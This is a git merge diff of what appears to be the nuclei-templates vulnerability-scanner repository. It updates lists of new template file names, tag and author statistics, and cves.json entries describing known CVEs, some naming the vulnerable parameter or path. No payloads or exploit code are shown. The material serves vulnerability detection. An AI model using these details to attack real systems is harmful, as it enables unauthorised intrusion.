Merge branch 'projectdiscovery:main' into main

.new-additions

@@ -1,40 +1,21 @@
-http/cnvd/2023/CNVD-2023-08743.yaml
-http/cves/2015/CVE-2015-9323.yaml
-http/cves/2019/CVE-2019-1898.yaml
-http/cves/2021/CVE-2021-24409.yaml
-http/cves/2021/CVE-2021-25065.yaml
-http/cves/2021/CVE-2021-41460.yaml
-http/cves/2022/CVE-2022-1756.yaml
-http/cves/2022/CVE-2022-39986.yaml
-http/cves/2022/CVE-2022-46463.yaml
-http/cves/2023/CVE-2023-4173.yaml
-http/default-logins/caimore/caimore-default-login.yaml
-http/default-logins/easyreport/easyreport-default-login.yaml
-http/exposed-panels/ibm-openadmin-panel.yaml
-http/exposed-panels/maltrail-panel.yaml
-http/exposed-panels/navicat-server-panel.yaml
-http/miscellaneous/defaced-website-detect.yaml
-http/misconfiguration/apache/apache-couchdb-unauth.yaml
-http/misconfiguration/feiyuxing-info-leak.yaml
-http/misconfiguration/request-baskets-exposure.yaml
-http/misconfiguration/unauth-redis-insight.yaml
-http/osint/vampr.yaml
-http/technologies/besu-server-detect.yaml
-http/technologies/erigon-server-detect.yaml
-http/technologies/geth-server-detect.yaml
-http/technologies/nethermind-server-detect.yaml
-http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml
-http/vulnerabilities/other/apache-druid-log4j.yaml
-http/vulnerabilities/other/aspcms-commentlist-sqli.yaml
-http/vulnerabilities/other/caimore-gateway-rce.yaml
-http/vulnerabilities/other/flir-ax8-rce.yaml
-http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml
-http/vulnerabilities/other/hanta-rce.yaml
-http/vulnerabilities/other/hongfan-ioffice-lfi.yaml
-http/vulnerabilities/other/hongfan-ioffice-rce.yaml
-http/vulnerabilities/other/landray-oa-erp-data-rce.yaml
-http/vulnerabilities/other/maltrail-rce.yaml
-http/vulnerabilities/ruijie/ruijie-excu-shell.yaml
-http/vulnerabilities/wordpress/wp-real-estate-xss.yaml
-network/jarm/c2/havoc-c2-jarm.yaml
-ssl/c2/havoc-c2.yaml
+http/cnvd/2021/CNVD-2021-32799.yaml
+http/cves/2016/CVE-2016-10108.yaml
+http/cves/2020/CVE-2020-11798.yaml
+http/cves/2022/CVE-2022-22897.yaml
+http/cves/2023/CVE-2023-20073.yaml
+http/cves/2023/CVE-2023-27034.yaml
+http/cves/2023/CVE-2023-30150.yaml
+http/cves/2023/CVE-2023-32563.yaml
+http/cves/2023/CVE-2023-34124.yaml
+http/cves/2023/CVE-2023-36844.yaml
+http/exposed-panels/aspcms-backend-panel.yaml
+http/exposed-panels/greenbone-panel.yaml
+http/misconfiguration/ecology-info-leak.yaml
+http/misconfiguration/php-debugbar-exposure.yaml
+http/takeovers/lemlist-takeover.yaml
+http/technologies/wordpress/plugins/wp-seopress.yaml
+http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml
+http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
+http/vulnerabilities/other/landray-oa-datajson-rce.yaml
+http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
+workflows/kev-workflow.yaml

README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR    | COUNT |      DIRECTORY       | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
-| cve       |  2017 | dhiyaneshdk  |  1045 | http                 |  6232 | info     |  3185 | file |   309 |
-| panel     |   974 | dwisiswant0  |   798 | file                 |   309 | high     |  1261 | dns  |    17 |
-| wordpress |   820 | daffainfo    |   787 | workflows            |   190 | medium   |  1251 |      |       |
-| exposure  |   777 | pikpikcu     |   353 | network              |   115 | critical |   752 |      |       |
-| xss       |   713 | pussycat0x   |   284 | ssl                  |    24 | low      |   228 |      |       |
-| wp-plugin |   711 | pdteam       |   282 | dns                  |    17 | unknown  |    29 |      |       |
-| osint     |   666 | ritikchaddha |   244 | headless             |     9 |          |       |      |       |
-| tech      |   623 | geeknik      |   221 | TEMPLATES-STATS.json |     1 |          |       |      |       |
-| edb       |   598 | ricardomaia  |   221 | contributors.json    |     1 |          |       |      |       |
-| lfi       |   579 | theamanrawat |   179 | cves.json            |     1 |          |       |      |       |
+| cve       |  2033 | dhiyaneshdk  |  1053 | http                 |  6290 | info     |  3199 | file |   309 |
+| panel     |   980 | dwisiswant0  |   798 | file                 |   309 | high     |  1283 | dns  |    17 |
+| wordpress |   827 | daffainfo    |   787 | workflows            |   190 | medium   |  1261 |      |       |
+| exposure  |   781 | pikpikcu     |   353 | network              |   116 | critical |   765 |      |       |
+| xss       |   720 | pussycat0x   |   288 | ssl                  |    25 | low      |   229 |      |       |
+| wp-plugin |   717 | pdteam       |   282 | dns                  |    17 | unknown  |    29 |      |       |
+| osint     |   669 | ritikchaddha |   247 | headless             |     9 |          |       |      |       |
+| tech      |   627 | ricardomaia  |   221 | TEMPLATES-STATS.json |     1 |          |       |      |       |
+| edb       |   598 | geeknik      |   221 | contributors.json    |     1 |          |       |      |       |
+| lfi       |   585 | theamanrawat |   179 | cves.json            |     1 |          |       |      |       |
 
-**475 directories, 7137 files**.
+**482 directories, 7197 files**.
 
 </td>
 </tr>

TOP-10.md

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR    | COUNT |      DIRECTORY       | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
-| cve       |  2017 | dhiyaneshdk  |  1045 | http                 |  6232 | info     |  3185 | file |   309 |
-| panel     |   974 | dwisiswant0  |   798 | file                 |   309 | high     |  1261 | dns  |    17 |
-| wordpress |   820 | daffainfo    |   787 | workflows            |   190 | medium   |  1251 |      |       |
-| exposure  |   777 | pikpikcu     |   353 | network              |   115 | critical |   752 |      |       |
-| xss       |   713 | pussycat0x   |   284 | ssl                  |    24 | low      |   228 |      |       |
-| wp-plugin |   711 | pdteam       |   282 | dns                  |    17 | unknown  |    29 |      |       |
-| osint     |   666 | ritikchaddha |   244 | headless             |     9 |          |       |      |       |
-| tech      |   623 | geeknik      |   221 | TEMPLATES-STATS.json |     1 |          |       |      |       |
-| edb       |   598 | ricardomaia  |   221 | contributors.json    |     1 |          |       |      |       |
-| lfi       |   579 | theamanrawat |   179 | cves.json            |     1 |          |       |      |       |
+| cve       |  2033 | dhiyaneshdk  |  1053 | http                 |  6290 | info     |  3199 | file |   309 |
+| panel     |   980 | dwisiswant0  |   798 | file                 |   309 | high     |  1283 | dns  |    17 |
+| wordpress |   827 | daffainfo    |   787 | workflows            |   190 | medium   |  1261 |      |       |
+| exposure  |   781 | pikpikcu     |   353 | network              |   116 | critical |   765 |      |       |
+| xss       |   720 | pussycat0x   |   288 | ssl                  |    25 | low      |   229 |      |       |
+| wp-plugin |   717 | pdteam       |   282 | dns                  |    17 | unknown  |    29 |      |       |
+| osint     |   669 | ritikchaddha |   247 | headless             |     9 |          |       |      |       |
+| tech      |   627 | ricardomaia  |   221 | TEMPLATES-STATS.json |     1 |          |       |      |       |
+| edb       |   598 | geeknik      |   221 | contributors.json    |     1 |          |       |      |       |
+| lfi       |   585 | theamanrawat |   179 | cves.json            |     1 |          |       |      |       |

cves.json

@@ -336,6 +336,7 @@
 {"ID":"CVE-2016-1000154","Info":{"Name":"WordPress WHIZZ \u003c=1.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-1000154.yaml"}
 {"ID":"CVE-2016-1000155","Info":{"Name":"WordPress WPSOLR \u003c=8.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-1000155.yaml"}
 {"ID":"CVE-2016-10033","Info":{"Name":"WordPress PHPMailer \u003c 5.2.18 - Remote Code Execution","Severity":"critical","Description":"WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10033.yaml"}
+{"ID":"CVE-2016-10108","Info":{"Name":"Western Digital MyCloud NAS - Command Injection","Severity":"critical","Description":"Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10108.yaml"}
 {"ID":"CVE-2016-10134","Info":{"Name":"Zabbix - SQL Injection","Severity":"critical","Description":"Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10134.yaml"}
 {"ID":"CVE-2016-10367","Info":{"Name":"Opsview Monitor Pro - Local File Inclusion","Severity":"high","Description":"Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-10367.yaml"}
 {"ID":"CVE-2016-10368","Info":{"Name":"Opsview Monitor Pro - Open Redirect","Severity":"medium","Description":"Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-10368.yaml"}
@@ -677,6 +678,7 @@
 {"ID":"CVE-2019-17538","Info":{"Name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","Severity":"high","Description":"Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1\u0026name=../.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-17538.yaml"}
 {"ID":"CVE-2019-17558","Info":{"Name":"Apache Solr \u003c=8.3.1 - Remote Code Execution","Severity":"high","Description":"Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-17558.yaml"}
 {"ID":"CVE-2019-17574","Info":{"Name":"Popup-Maker \u003c 1.8.12 - Broken Authentication","Severity":"critical","Description":"An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the \"support debug text file\").\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2019/CVE-2019-17574.yaml"}
+{"ID":"CVE-2019-17662","Info":{"Name":"ThinVNC 1.0b1 - Authentication Bypass","Severity":"critical","Description":"ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-17662.yaml"}
 {"ID":"CVE-2019-1821","Info":{"Name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","Severity":"critical","Description":"Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-1821.yaml"}
 {"ID":"CVE-2019-18371","Info":{"Name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","Severity":"high","Description":"Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-18371.yaml"}
 {"ID":"CVE-2019-18393","Info":{"Name":"Ignite Realtime Openfire \u003c4.42 - Local File Inclusion","Severity":"medium","Description":"Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-18393.yaml"}
@@ -771,6 +773,7 @@
 {"ID":"CVE-2020-11547","Info":{"Name":"PRTG Network Monitor \u003c20.1.57.1745 - Information Disclosure","Severity":"medium","Description":"PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-11547.yaml"}
 {"ID":"CVE-2020-11710","Info":{"Name":"Kong Admin \u003c=2.03 - Admin API Access","Severity":"critical","Description":"Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11710.yaml"}
 {"ID":"CVE-2020-11738","Info":{"Name":"WordPress Duplicator 1.3.24 \u0026 1.3.26 - Local File Inclusion","Severity":"high","Description":"WordPress Duplicator 1.3.24 \u0026 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two\nversions v1.3.24 and v1.3.26, the vulnerability wasn't\npresent in versions 1.3.22 and before.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-11738.yaml"}
+{"ID":"CVE-2020-11798","Info":{"Name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","Severity":"medium","Description":"A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-11798.yaml"}
 {"ID":"CVE-2020-11853","Info":{"Name":"Micro Focus Operations Bridge Manager \u003c=2020.05 - Remote Code Execution","Severity":"high","Description":"Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654).\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-11853.yaml"}
 {"ID":"CVE-2020-11854","Info":{"Name":"Micro Focus UCMDB - Remote Code Execution","Severity":"critical","Description":"Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11854.yaml"}
 {"ID":"CVE-2020-11930","Info":{"Name":"WordPress GTranslate \u003c2.8.52 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-11930.yaml"}
@@ -1122,6 +1125,7 @@
 {"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"}
 {"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"}
 {"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
+{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
 {"ID":"CVE-2021-24970","Info":{"Name":"WordPress All-In-One Video Gallery \u003c2.5.0 - Local File Inclusion","Severity":"high","Description":"WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24970.yaml"}
 {"ID":"CVE-2021-24987","Info":{"Name":"WordPress Super Socializer \u003c7.13.30 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24987.yaml"}
 {"ID":"CVE-2021-24991","Info":{"Name":"WooCommerce PDF Invoices \u0026 Packing Slips WordPress Plugin \u003c 2.10.5 - Cross-Site Scripting","Severity":"medium","Description":"The Wordpress plugin WooCommerce PDF Invoices \u0026 Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-24991.yaml"}
@@ -1536,6 +1540,7 @@
 {"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"}
 {"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"}
 {"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"}
+{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop Ap Pagebuilder \u003c= 2.4.4 SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"}
 {"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2290.yaml"}
 {"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22947.yaml"}
 {"ID":"CVE-2022-22954","Info":{"Name":"VMware Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22954.yaml"}
@@ -1834,6 +1839,7 @@
 {"ID":"CVE-2022-46934","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46934.yaml"}
 {"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47002.yaml"}
 {"ID":"CVE-2022-47003","Info":{"Name":"Mura CMS \u003c10.0.580 - Authentication Bypass","Severity":"critical","Description":"Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47003.yaml"}
+{"ID":"CVE-2022-47615","Info":{"Name":"LearnPress Plugin \u003c 4.2.0 - Local File Inclusion","Severity":"critical","Description":"Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin \u003c= 4.1.7.3.2 versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47615.yaml"}
 {"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47945.yaml"}
 {"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47966.yaml"}
 {"ID":"CVE-2022-47986","Info":{"Name":"IBM Aspera Faspex \u003c=4.4.2 PL1 - Remote Code Execution","Severity":"critical","Description":"IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47986.yaml"}
@@ -1869,6 +1875,7 @@
 {"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"}
 {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
 {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
+{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"}
 {"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"}
